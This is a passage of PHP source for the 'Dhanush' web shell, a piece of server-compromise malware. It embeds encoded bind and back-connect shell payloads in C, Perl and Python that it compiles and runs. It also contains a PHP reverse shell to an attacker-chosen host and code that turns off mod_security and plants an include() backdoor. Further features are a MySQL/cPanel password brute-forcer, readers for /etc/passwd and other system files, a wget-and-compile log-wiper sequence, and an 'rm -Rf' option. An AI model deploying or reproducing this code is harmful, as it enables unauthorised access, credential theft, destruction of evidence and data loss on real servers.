7319 document.getElementById('smfipb').style.display='none';
7320 }
7321 if(msg == 'vb')
7322 {
7323 document.getElementById('tableprefix').value="";
7324 document.getElementById('myjoomla').style.display='none';
7325 document.getElementById('smfipb').style.display='none';
7326 }
7327 if(msg == 'ipb')
7328 {
7329 document.getElementById('myjoomla').style.display='none';
7330 document.getElementById('smfipb').style.display='block';
7331 document.getElementById('tableprefix').value="";
7332 }
7333 if(msg == 'wp')
7334 {
7335 document.getElementById('tableprefix').value="wp_";
7336 document.getElementById('myjoomla').style.display='block';
7337 document.getElementById('smfipb').style.display='none';
7338 document.getElementById('siteurl').value="http://site/blog";
7339 }
7340 if(msg == 'joomla')
7341 {
7342 document.getElementById('myjoomla').style.display='block';
7343 document.getElementById('tableprefix').value="jos_";
7344 document.getElementById('smfipb').style.display='none';
7345 document.getElementById('siteurl').value="http://site/administrator/";
7346 }
7347}
7348</script>
7349<body>
7350<?php
7351
7352$back_connect_p="eNqlU01PwzAMvVfqfwjlkkpd94HEAZTDGENCCJC2cRrT1DUZCWvjqk5A/fcs3Rgg1gk0XxLnPT/bsnN60rZYthdKt4vKSNC+53sqL6A0BCuMCEK6EiYi4O52UZSQCkTHkoCGMMeKk/Llbdqd+V4dx4jShu7ee7PQ0TdCMQrDxTKxmTEqF2ANPe/U+LtUmSDdC98ja0NYOe1tTH3Qrde/md8+DCfR1h0/Du7m48lo2L8Pd7FxClqL1FDqqoxcWeE3FIXmNGBH2LMOfum1mu1aJtqibCY4vcs/Cg6AC06uKtIvX63+j+CxHe+pkLFxhUbkSi+BsU3eDQsw5rboUcdermergYZR5xDYPQT2DoFnn8OQIsvc4uw2NU6TLKPTwOokF0EUtJJgFu5r4wlFSRT/2UOznuJfOo2k+l+hdGnVmv4Bmanx6Q==";
7353
7354$backconnect_perl="eNqlUl9rwjAQfxf8Drcqa4UWt1dLZU7rJmN2tNWXTUps45qtJiVNGf32S9pOcSAI3kNI7vcnd9z1boZlwYdbQoc55llZYFh4o1HA4m8s7G6n2+kXVSHwHmQ4oNfMLSpSXYL9if80dR7kuZYvpW110LzmJMPPiCYZVplup6hRI/CmL25owts8WizVRSWiIPTdyasJn1jknAm2rSjaY0MXca4PBtI/ZpTi+ChXbihJeESooSpZv99vTCAUiwgJ9pe72wykuv6+EVpjVAq2k62mRg2wHFMjCGeLpQna+LZhaSeQtwrNM5Dr+/+hnBMqQHOuiA+q2Qcj63zMUkRlI+cJlxhNWYITeKxgwr9KeonRda01Vs1aGRqOUwaW5ThBnSB0xxzHsmwo1fzBQjYoin3grQrMjyyS2KfwjHC5JYxXDZ7/tAQ4fpTiLFMoqHm1dbRrrhat53rzX0SL2FA=";
7355
7356$bind_port_c="bZJRT9swEIDfK/U/eEVa7WJK0mkPrMukaoCEpnUT8DKVKjK2Q05LbMt2KGzw3+ekKQ0Zfkn83efL3TkHoHhRCYk+Oy9AT/Mvw8FBh1lQdz1YKQhuDyrpxe1/p0UBWwjKo5KBwvULs3ecIp4ziyaTsLkn6O9wgMKqo45yCvPtvnHM6kO0bkEoqOLB0fw3E8KmoJBtQ4LJUisc04jsZJQ0pvR4cZ5eLM+u6dWPr9/Sq+vLs8X3vQcZfucIstJXVqGjuMV26kClGSuheAyZ2hSvgkZbH0K518ph5jXgup1VvCbklVfXOnXNo9ULfLFcnJ5epovlr517C0pgRxHudYkm5L2lKHqIX0ouwhVIVcsfd2iTQyFx/DLLZn4J41waH8Ro328zrcrMMH+TxW+wWZdtLHgZ4Ognc26jrfg0oiddwUomQtxQB3+kzrAh3WimLYYkmkP9exWhC0PmcHhI9kZ7KQibFaxRkqDxjRoT9PTUJTaQ3pl6bYUQj8adb0LWTJWXZntDszU1pM4T9VK4xzDYEo+Ow2UcuxwdwahbOy+0C63v0PNw8PwP";
7357
7358$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
7359
7360echo $shellstyle;
7361?>
7362<table style="width:100%;">
7363<tr align="right">
7364<td><a href="<?php echo $self;?>"><font size="6" style="text-decoration:none;" face="Times New Roman, Times, serif">Dhanush : By Arjun </font></a>
7365</td><td align="right">
7366<form method="get">
7367<select id="style" class="sbox" onChange="change_style(this.value)">
7368<option selected="selected">--Style--</option>
7369<option value="dhanush">Dhanush</option>
7370<option value="404">404</option>
7371<option value="phizo">Phizo</option>
7372<option value="orange">Orange</option>
7373</select>
7374</form></td>
7375</tr></table>
7376<hr color="#1B1B1B">
7377
7378<table cellpadding="0" style="width:100%;">
7379 <tr>
7380 <td colspan="2" style="width:85%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
7381 <td style="width:7%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
7382 <td style="width:8%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
7383 </tr>
7384 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
7385 <td style="width:85%;" colspan="2">Uid : <font class="txt"><?php if(shell_exec("id")){echo shell_exec("id");}else{echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid();} ?></font></td>
7386 <?php $d0mains = @file("/etc/named.conf");
7387 $users=@file('/etc/passwd');
7388 if($d0mains)
7389 {
7390 $count;
7391 foreach($d0mains as $d0main)
7392 {
7393 if(@ereg("zone",$d0main))
7394 {
7395 preg_match_all('#zone "(.*)"#', $d0main, $domains);
7396 flush();
7397 if(strlen(trim($domains[1][0])) > 2)
7398 {
7399 flush();
7400 $count++;
7401 }
7402 }
7403 }
7404 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
7405 }
7406 else if($users)
7407 {
7408 $file = fopen("/etc/passwd", "r");
7409 while(!feof($file))
7410 {
7411 $s = fgets($file);
7412 $matches = array();
7413 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
7414 $matches = str_replace("home/","",$matches[1]);
7415 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
7416 continue;
7417 $count++;
7418 }
7419 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
7420 <?php if($os == "Linux") { ?><td style="width:8%;vertical-align:text-top;"><a href="<?php echo $self.'?downloadit'?>">Download It</a></td><?php } ?>
7421 </tr><?php } ?>
7422 <tr>
7423 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); ?> of <?php echo HumanReadableFilesize(diskSpace()); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
7424 <td style="width:20%;vertical-align:text-top;">Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
7425
7426 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
7427 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
7428 </tr>
7429
7430 <tr>
7431 <?php if($os == 'Windows'){ ?><td style="width:15%;vertical-align:text-top;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
7432 <td style="width:30%;vertical-align:text-top;">Current Directory : <span id="crdir"><font color="#009900">
7433 <?php
7434 $d = str_replace("\\",$directorysperator,$dir);
7435 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
7436 $d = str_replace("\\\\","\\",$d);
7437 $dispd = htmlspecialchars($d);
7438 $pd = $e = explode($directorysperator,substr($d,0,-1));
7439 $i = 0;
7440 foreach($pd as $b)
7441 {
7442 $t = '';
7443 $j = 0;
7444 foreach ($e as $r)
7445 {
7446 $t.= $r.$directorysperator;
7447 if ($j == $i) {break;}
7448 $j++;
7449 }
7450$href=addslashes($t);
7451
7452 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
7453 $i++;
7454 }
7455
7456 ?>
7457 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
7458 <td colspan="3" style="width:20%;max-width:200px;word-break:break-all;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
7459 </tr>
7460 </table>
7461
7462<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
7463 $m2 = array('SQL'=>'database','Sub-Domain Creator'=>'subdomain','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
7464 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
7465 <tr>";
7466 $menu = '';
7467
7468 foreach($m1 as $k => $v)
7469 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
7470 echo $menu;
7471 echo "</tr>
7472</table>
7473<center>
7474<table style=\"border-color:#333333;\" border=2 width=70%; cellpadding=2>
7475 <tr align=center>";
7476 foreach($m2 as $k => $v)
7477 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
7478 echo $menu1;
7479 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
7480 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
7481 </tr>
7482</table></center>";?>
7483
7484<div id="showmaindata"></div>
7485<center><div id="showmydata"></div></center>
7486<?php
7487
7488if(isset($_GET["downloadit"]))
7489{
7490 $FolderToCompress = getcwd();
7491 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
7492
7493 $prd=explode("/","backup.tar");
7494 for($i=0;$i<sizeof($prd);$i++)
7495 {
7496 $nfd=$prd[$i];
7497 }
7498 @ob_clean();
7499 header("Content-type: application/octet-stream");
7500 header("Content-length: ".filesize($nfd));
7501 header("Content-disposition: attachment; filename=\"".$nfd."\";");
7502 readfile($nfd);
7503 exit;
7504}
7505//Turn Safe Mode Off
7506if(getDisabledFunctions() != "None" || safe() != "OFF")
7507{
7508 $file_pointer = fopen(".htaccess", "w+");
7509 fwrite($file_pointer, "<IfModule mod_security.c>
7510 SecFilterEngine Off
7511 SecFilterScanPOST Off
7512 </IfModule> \n\r");
7513
7514 $file_pointer = fopen("ini.php", "w+");
7515 fwrite($file_pointer, "<?
7516echo ini_get(\"safe_mode\");
7517echo ini_get(\"open_basedir\");
7518include(\$_GET[\"file\"]);
7519ini_restore(\"safe_mode\");
7520ini_restore(\"open_basedir\");
7521echo ini_get(\"safe_mode\");
7522echo ini_get(\"open_basedir\");
7523include(\$_GET[\"ss\"]);
7524?>");
7525
7526 $file_pointer = fopen("php.ini", "w+");
7527 fwrite($file_pointer, "safe_mode = Off");
7528
7529 fclose($file_pointer);
7530
7531 }
7532
7533if(isset($_POST['cpanelattack']))
7534{
7535 if(!empty($_POST['username']) && !empty($_POST['password']))
7536 {
7537 $userlist=explode("\n",$_POST['username']);
7538 $passlist=explode("\n",$_POST['password']);
7539
7540 $e = explode("\n",$_POST['username']);
7541 foreach($e as $value)
7542 {
7543 $k = explode(":",$value);
7544 $username .= $k['0']." ";
7545 }
7546
7547 $a1 = explode(" ",$username);
7548 $a2 = explode("\n",$_POST['password']);
7549 $id2 = count($a2);
7550 $ok = 0;
7551 foreach($a1 as $user)
7552
7553 {
7554 if($user !== '')
7555 {
7556 $user=trim($user);
7557 for($i=0;$i<=$id2;$i++)
7558 {
7559 $pass = trim($a2[$i]);
7560 if(@mysql_connect('localhost',$user,$pass))
7561 {
7562 echo "User is (<b>$user</b>) Password is (<b><font class='txt'>$pass</font></b>)<br />";
7563 $ok++;
7564 }
7565 }
7566 }
7567 }
7568 echo "<hr><b>You Found <font color=red>$ok</font></b>";
7569 }
7570 else
7571 $bdmessage = "<center>Enter Username & Password List<center>";
7572}
7573elseif(isset($_GET['style']))
7574{
7575 setcookie('style',$_GET['style']);
7576 header("location:$self");
7577}
7578else if(isset($_GET['info']))
7579{
7580 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
7581}
7582else if(isset($_POST['u']))
7583{
7584 $path = $_REQUEST['path'];
7585 if(is_dir($path))
7586 {
7587 $setuploadvalue = 0;
7588 $uploadedFilePath = $_FILES['uploadfile']['name'];
7589 $tempName = $_FILES['uploadfile']['tmp_name'];
7590 if($os == "Windows")
7591 $uploadPath = $path . $directorysperator . $uploadedFilePath;
7592 else if($os == "Linux")
7593 $uploadPath = $path . $directorysperator . $uploadedFilePath;
7594 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
7595 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
7596 else
7597 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
7598 }
7599 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
7600}
7601else if(isset($_POST['backdoor']))
7602{
7603 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
7604 { ?><script type="text/javascript">gethome('connect');</script><?php
7605 $passwd = $_POST['passwd'];
7606
7607 if($_POST['lang'] == 'c')
7608 {
7609 if(is_writable("."))
7610 {
7611 @$fh=fopen(getcwd()."/backp.c",'w');
7612 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
7613 @fclose($fh);
7614 execmd("chmod 0755 ".getcwd()."/backp.c");
7615 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
7616 execmd("chmod 0755 ".getcwd()."/backp");
7617 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
7618 $scan = exec_all("ps aux | grep backp".$_POST['port']);
7619 if(eregi("backp".$_POST['port'],$scan))
7620 $bdmessage = "Process found running, backdoor setup successfully.";
7621 else
7622 $bdmessage = "Process not found running, backdoor not setup successfully.";
7623 }
7624 else
7625 {
7626 @$fh=fopen("/tmp/backp.c","w");
7627 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
7628 @fclose($fh);
7629 execmd("chmod 0755 /tmp/backp.c");
7630 execmd("gcc -o /tmp/backp /tmp/backp.c");
7631 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
7632 $scan = exec_all("ps aux | grep backp".$_POST['port']);
7633 if(eregi("backp".$_POST['port'],$scan))
7634 $bdmessage = "Process found running, backdoor setup successfully.";
7635 else
7636 $bdmessage = "Process not found running, backdoor not setup successfully.";
7637 }
7638 }
7639 if($_POST['lang'] == 'perl')
7640 {
7641 if(is_writable("."))
7642 {
7643 @$fh=fopen(getcwd()."/bp.pl",'w');
7644 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
7645 @fclose($fh);
7646 execmd("chmod 0755 ".getcwd()."/bp.pl");
7647 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
7648
7649 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
7650 }
7651 else
7652 {
7653 @$fh=fopen("/tmp/bp.pl","w");
7654 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
7655 @fclose($fh);
7656 execmd("chmod 0755 ".getcwd()."/bp.pl");
7657 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
7658 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
7659 }
7660 }
7661 }
7662}
7663else if(isset($_POST['backconnect']))
7664{
7665 if($_POST['ip'] != "" && $_POST['port'] != "")
7666 { ?><script type="text/javascript">gethome('connect');</script><?php
7667 $host = $_POST['ip'];
7668 $port = $_POST['port'];
7669 if($_POST["lang"] == "perl")
7670 {
7671 if(is_writable("."))
7672 {
7673 @$fh=fopen(getcwd()."/bc.pl",'w');
7674 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
7675 @fclose($fh);
7676 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7677 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
7678 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
7679 }
7680 else
7681 {
7682 @$fh=fopen("/tmp/bc.pl","w");
7683 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
7684 @fclose($fh);
7685 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7686 execmd("perl /tmp/bc.pl $host $port &",$disable);
7687 if(!@unlink("/tmp/bc.pl"))
7688 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
7689 }
7690 }
7691 else if($_POST["lang"] == "python")
7692 {
7693 if(is_writable("."))
7694 {
7695 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
7696 if($w_file)
7697 {
7698 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
7699 @fclose($w_file);
7700 chmod(getcwd().'/bc.py', 0777);
7701 }
7702 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
7703 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7704
7705 if(!@unlink(getcwd()."/bc.py"))
7706 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
7707 }
7708 else
7709 {
7710 $w_file=@fopen("/tmp/bc.py","w");
7711 if($w_file)
7712 {
7713 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
7714 @fclose($w_file);
7715 chmod('/tmp/bc.py', 0777);
7716 }
7717 execmd("python /tmp/bc.py $host $port &",$disable);
7718 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7719 if(!@unlink("/tmp/bc.py"))
7720 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
7721 }
7722 }
7723 else if($_POST["lang"] == "php")
7724 {
7725 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7726 $ip = $_POST['ip'];
7727 $port=$_POST['port'];
7728 $sockfd=fsockopen($ip , $port , $errno, $errstr );
7729 if($errno != 0)
7730 {
7731 $bdmessage = "<b>$errno</b> : $errstr";
7732 }
7733 else if (!$sockfd)
7734 {
7735 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
7736 }
7737 else
7738 {
7739 fputs ($sockfd ,"\n=================================================================\nCoded By Arjun\n=================================================================");
7740 $pwd = exec_all("pwd");
7741 $sysinfo = exec_all("uname -a");
7742 $id = exec_all("id");
7743 $len = 1337;
7744 fputs($sockfd ,$sysinfo . "\n" );
7745 fputs($sockfd ,$pwd . "\n" );
7746 fputs($sockfd ,$id ."\n\n" );
7747 fputs($sockfd ,$dateAndTime."\n\n" );
7748 while(!feof($sockfd))
7749 {
7750 $cmdPrompt ="(dhanush)[$]> ";
7751 fputs ($sockfd , $cmdPrompt );
7752 $command= fgets($sockfd, $len);
7753 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
7754 }
7755 fclose($sockfd);
7756 }
7757 }
7758 }
7759}
7760else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
7761{
7762 $temp = "";
7763 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
7764 {
7765 $uid = @posix_getpwuid($_GET['val1']);
7766 if ($uid)
7767 $temp .= join(':',$uid)."\n";
7768 }
7769 echo '<br/>';
7770 paramexe('Users', $temp);
7771}
7772else if(isset($_GET['download']))
7773{
7774 download();
7775}
7776else
7777{
7778 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
7779}
7780$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
7781?>
7782</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
7783<table class="btmtbl" style="width:100%;" border="1">
7784<tr>
7785<td class="btmtbl" align="center">
7786<form method="post" enctype="multipart/form-data">
7787Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
7788<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
7789<input type=submit value="Upload" name="u" value="u" class="but" ></form>
7790<span name="wrtble"><?php
7791
7792echo $is_writable; ?></span>
7793 <br>
7794</td>
7795<td class="btmtbl" align="center" style="height:105px;">Create File :
7796<form onSubmit="createdir('Create',createfile.value);return false;">
7797<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
7798<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
7799</form><span name="wrtble">
7800<?php echo $is_writable; ?></span>
7801</td>
7802</tr>
7803<tr>
7804<td class="btmtbl" align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
7805<input type="text" class="box" name="execute">
7806<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
7807 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
7808
7809<td class="btmtbl" align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
7810<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
7811<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
7812</form><span name="wrtble"><?php
7813echo $is_writable;
7814?></span></td></tr>
7815<tr>
7816<td class="btmtbl" align="center">Read File<form onSubmit="createdir('readfile',readfile.value);return false;">
7817<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readfile" id="readfile">
7818<input type="button" onClick="createdir('readfile',readfile.value)" value="Read" class="but">
7819</form></td>
7820<td class="btmtbl" align="center">Read Directory<form onSubmit="changedir('dir',readdir.value);return false;">
7821<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readdir" id="readdir">
7822<input type="button" onClick="changedir('dir',readdir.value)" value=" View " class="but">
7823</form></td></tr>
7824<tr><td class="btmtbl" style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
7825<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
7826<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
7827<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
7828<select name="functiontype" class="sbox">
7829<option value="wwget">wget</option>
7830<option value="wlynx">lynx</option>
7831<option value="wfread">fread</option>
7832<option value="wfetch">fetch</option>
7833<option value="wlinks">links</option>
7834<option value="wget">GET</option>
7835<option value="wcurl">curl</option>
7836</select>
7837</form><div id="showexp"></div>
7838</td>
7839<td class="btmtbl" align="center">
7840<form>
7841Some Commands<br>
7842<?php if($os != "Windows")
7843{ ?>
7844<SELECT NAME="mycmd" class="box">
7845 <OPTION VALUE="uname -a">Kernel version
7846 <OPTION VALUE="w">Logged in users
7847 <OPTION VALUE="lastlog">Last to connect
7848 <option value='cat /etc/hosts'>IP Addresses
7849 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
7850 <OPTION VALUE="logeraser">Log Eraser
7851 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
7852 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
7853 <OPTION VALUE="find / -type f -name 'config'">find config files
7854 <OPTION VALUE="find . -type f -name \"config\"">find config files in current dir
7855
7856 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
7857 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
7858 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
7859 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
7860 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
7861 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
7862 <OPTION VALUE="ps aux">Show running proccess
7863 <OPTION VALUE="uptime">Uptime check
7864 <OPTION VALUE="cat /proc/meminfo">Memory check
7865 <OPTION VALUE="netstat -an | grep -i listen">Open ports
7866 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
7867 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
7868 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
7869 <OPTION VALUE="./zap2">WIPELOGS PT3
7870 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
7871 </SELECT>
7872 <?php } else {?>
7873 <SELECT NAME="mycmd" class="box">
7874 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
7875 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
7876 <OPTION VALUE="systeminfo">System Informations
7877 <OPTION VALUE="net user">User accounts
7878 <OPTION VALUE="netstat -an">Open ports
7879 <OPTION VALUE="getmac">Get Mac Address
7880 <OPTION VALUE="net start">Show running services
7881 <OPTION VALUE="net view">Show computers
7882 <OPTION VALUE="arp -a">ARP Table
7883 <OPTION VALUE="tasklist">Show Process
7884 <OPTION VALUE="ipconfig/all">IP Configuration
7885
7886 </SELECT>
7887 <?php } ?>
7888 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
7889<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
7890</form>
7891</td>
7892</tr></table><br>
7893
7894</td>
7895</tr>
7896</table>
7897
7898<?php
7899
7900
7901//logout
7902
7903if(isset($_GET['logout']))
7904{
7905 setcookie("hacked",time() - 60*60);
7906 header("Location:$self");
7907 ob_end_flush();
7908}
7909?>
7910
7911
7912<hr color="#1B1B1B">
7913<div align="center">
7914<font size="6" face="Times New Roman, Times, serif">धनुष<br>
7915--==Coded By Arjun==--</font><br><a href="http://www.google.com/search?q=%E0%A4%9C%E0%A4%AF%20%E0%A4%B9%E0%A4%BF%E0%A4%A8%E0%A5%8D%E0%A4%A6" target="_blank"><font size="6">जय हिन्द</font></a></div>
7916<?php
7917}
7918}
7919
7920if(isset($_POST['uname']) && isset($_POST['passwd']))
7921{
7922 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
7923 {
7924 setcookie("hacked", md5($pass));
7925 $selfenter = $_SERVER["PHP_SELF"];
7926 header("Location:$selfenter");
7927 }
7928}
7929
7930if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
7931{
7932 echo $shellstyle;
7933?>
7934 <center>
7935 <form method="POST">
7936 <div class="logindiv" style="width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px;">
7937 <table cellpadding="9" cellspacing="4">
7938 <tr>
7939 <td align="center" colspan="2"><blink><font size="7"><b>Dhanush</b></font></blink></td>
7940 </tr>
7941 <tr>
7942 <td align="right"><b>User Name : </b></td>
7943 <td><input type="text" name="uname" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
7944 </tr>
7945 <tr>
7946 <td align="right"><b>Password : </b></td>
7947 <td><input type="password" name="passwd" style="background-color:#333333; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
7948 </tr>
7949 <tr>
7950 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
7951 </tr>
7952 <tr>
7953 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b>--==Coded By Arjun==--</b></font></td>
7954 </tr>
7955 <tr>
